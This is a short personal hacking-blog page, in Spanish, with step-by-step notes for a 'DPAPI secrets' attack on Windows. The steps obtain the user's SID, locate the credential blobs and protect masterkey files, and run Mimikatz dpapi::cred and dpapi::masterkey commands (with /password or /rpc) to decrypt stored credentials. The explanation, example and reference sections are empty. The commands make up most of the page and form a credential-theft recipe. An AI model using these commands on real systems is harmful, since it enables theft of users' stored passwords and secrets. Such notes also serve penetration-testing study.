Grunt's personal blog

this is my personal blog for my hacking stuff, my degree stuff, etc

View on GitHub

DPAPI secrets Attack

Explicación

Que se necesita para hacer este ataque

Pasos

  1. Obtener el SID del usuario: whoami /user o wmic useraccount get name,sid
  2. Obtener el masterkey cifrado con la contraseña del usuario: C:\users\<user>\appdata\local\microsoft\credentials\<blob>
  3. Obtener el masterkey cifrado con la contraseña del usuario: C:\users\<user>\appdata\roaming\microsoft\protect\<SID>\
  4. Mimikatz: dpapi::cred /in:C:\users\<user>\appdata\local\microsoft\credentials\<credential blob>
    • Nos guardamos guidMasterKey y pbData
    • Revisar c:\users\<user>\appdata\roaming\microsoft\protect\<SID>\ para ver si hay un archivo con el mismo guidMasterKey
    • Si lo hay, usamos mimikatz dpapi::masterkey /in:C:\users\<user>\appdata\roaming\microsoft\protect\<SID>\<guidMasterKey> /password:<password>
    • mimikatz dpapi::masterkey /in:C:\users\<user>\appdata\roaming\microsoft\protect\<SID>\<MasterKey blob> /rpc

Otros comandos

Ejemplo:

Referencias